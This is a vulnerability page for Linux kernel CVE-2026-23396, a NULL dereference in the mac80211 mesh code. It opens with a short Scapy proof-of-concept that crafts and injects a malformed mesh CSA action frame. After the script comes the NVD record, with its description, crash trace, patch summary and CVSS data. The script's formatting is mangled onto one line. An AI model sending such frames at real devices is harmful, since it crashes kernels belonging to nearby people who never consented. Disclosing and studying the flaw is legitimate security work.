CVE-2026-23396

# PoC: Crafted CSA frame to trigger NULL dereference # Tool: Scapy from scapy.all import * def send_exploit(): target = "AA:BB:CC:DD:EE:FF" # Target Mesh BSSID iface = "wlan0mon" # RadioTap / Dot11 Header pkt = RadioTap() / \ Dot11(type=0, subtype=13, addr1=target, addr2="11:22:33:44:55:66", addr3=target) / \ bytes([0x0D, 0x03]) / Category: Mesh, Action: CSA # Include Mesh ID IE (ID 114), OMIT Mesh Configuration IE (ID 113) pkt /= Dot11Elt(ID=114, info="meshid") sendp(pkt, iface=iface, count=1) print("Packet sent.")

{"cve": {"id": "CVE-2026-23396", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-26T11:16:18.750", "lastModified": "2026-04-24T15:18:27.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: fix NULL deref in mesh_matches_local()\n\nmesh_matches_local() unconditionally dereferences ie->mesh_config to\ncompare mesh configuration parameters. When called from\nmesh_rx_csa_frame(), the parsed action-frame elements may not contain a\nMesh Configuration IE, leaving ie->mesh_config NULL and triggering a\nkernel NULL pointer dereference.\n\nThe other two callers are already safe:\n - ieee80211_mesh_rx_bcn_presp() checks !elems->mesh_config before\n calling mesh_matches_local()\n - mesh_plink_get_event() is only reached through\n mesh_process_plink_frame(), which checks !elems->mesh_config, too\n\nmesh_rx_csa_frame() is the only caller that passes raw parsed elements\nto mesh_matches_local() without guarding mesh_config. An adjacent\nattacker can exploit this by sending a crafted CSA action frame that\nincludes a valid Mesh ID IE but omits the Mesh Configuration IE,\ncrashing the kernel.\n\nThe captured crash log:\n\nOops: general protection fault, probably for non-canonical address ...\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nWorkqueue: events_unbound cfg80211_wiphy_work\n[...]\nCall Trace:\n <TASK>\n ? __pfx_mesh_matches_local (net/mac80211/mesh.c:65)\n ieee80211_mesh_rx_queued_mgmt (net/mac80211/mesh.c:1686)\n [...]\n ieee80211_iface_work (net/mac80211/iface.c:1754 net/mac80211/iface.c:1802)\n [...]\n cfg80211_wiphy_work (net/wireless/core.c:426)\n process_one_work (net/kernel/workqueue.c:3280)\n ? assign_work (net/kernel/workqueue.c:1219)\n worker_thread (net/kernel/workqueue.c:3352)\n ? __pfx_worker_thread (net/kernel/workqueue.c:3385)\n kthread (net/kernel/kthread.c:436)\n [...]\n ret_from_fork_asm (net/arch/x86/entry/entry_64.S:255)\n </TASK>\n\nThis patch adds a NULL check for ie->mesh_config at the top of\nmesh_matches_local() to return false early when the Mesh Configuration\nIE is absent."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nwifi: mac80211: corrige desreferencia de NULL en mesh_matches_local()\n\nmesh_matches_local() desreferencia incondicionalmente ie-&gt;mesh_config para comparar los parámetros de configuración de malla. Cuando se llama desde mesh_rx_csa_frame(), los elementos de la trama de acción analizados pueden no contener un IE de Configuración de Malla, dejando ie-&gt;mesh_config como NULL y desencadenando una desreferencia de puntero NULL del kernel.\n\nLos otros dos llamadores ya son seguros:\n - ieee80211_mesh_rx_bcn_presp() comprueba !elems-&gt;mesh_config antes de llamar a mesh_matches_local()\n - mesh_plink_get_event() solo se alcanza a través de mesh_process_plink_frame(), que también comprueba !elems-&gt;mesh_config\n\nmesh_rx_csa_frame() es el único llamador que pasa elementos analizados en bruto a mesh_matches_local() sin proteger mesh_config. Un atacante adyacente puede explotar esto enviando una trama de acción CSA manipulada que incluye un IE de ID de Malla válido pero omite el IE de Configuración de Malla, provocando el fallo del kernel.\n\nEl registro de fallo capturado:\n\nOops: fallo de protección general, probablemente para dirección no canónica ...\nKASAN: desreferencia de puntero nulo en el rango [0x0000000000000000-0x0000000000000007]\nCola de trabajo: events_unbound cfg80211_wiphy_work\n[...]\nTraza de Llamada:\n \n ? __pfx_mesh_matches_local (net/mac80211/mesh.c:65)\n ieee80211_mesh_rx_queued_mgmt (net/mac80211/mesh.c:1686)\n [...]\n ieee80211_iface_work (net/mac80211/iface.c:1754 net/mac80211/iface.c:1802)\n [...]\n cfg80211_wiphy_work (net/wireless/core.c:426)\n process_one_work (net/kernel/workqueue.c:3280)\n ? assign_work (net/kernel/workqueue.c:1219)\n worker_thread (net/kernel/workqueue.c:3352)\n ? __pfx_worker_thread (net/kernel/workqueue.c:3385)\n kthread (net/kernel/kthread.c:436)\n [...]\n ret_from_fork_asm (net/arch/x86/entry/entry_64.S:255)\n \n\nEste parche añade una comprobación de NULL para ie-&gt;mesh_config al principio de mesh_matches_local() para devolver falso anticipadamente cuando el IE de Configuración de Malla está ausente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", ... (truncated)